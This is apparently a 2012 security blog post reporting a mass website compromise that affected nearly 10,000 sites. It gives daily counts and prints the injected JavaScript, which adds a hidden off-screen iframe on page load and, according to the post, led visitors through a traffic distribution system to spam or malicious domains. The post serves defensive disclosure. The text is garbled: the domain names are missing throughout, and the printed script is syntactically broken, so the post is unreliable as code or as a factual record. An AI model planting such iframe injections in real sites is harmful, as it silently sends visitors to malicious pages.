Mass infections from

We are seeing a large number of sites compromised with an iframe pointing to .Just in the last 3 days, we identified almost 10,000 sites with it:

2012/Oct/11 - 4393 sites -
2012/Oct/10 - 3117 sites -
2012/Oct/09 -  865 sites -

On all the compromised sites have the iframes similar to this one:

<script> function frmAdd() { var ifrm = document.createElement("iframe"); ifrm. style.position="absolute';'-999em';'-999em';  ifrm.src = ""; = 'frmId';document.body. appendChild (ifrm);};window.onload = frmAdd;..

The domain is hosted at, but currently offline (redirecting to Google), so we can\'t really tell what it is doing. But on previous requests, it was redirecting to a TDS (traffic distribution system) and from there, being sent to multiple spam or malicious domains.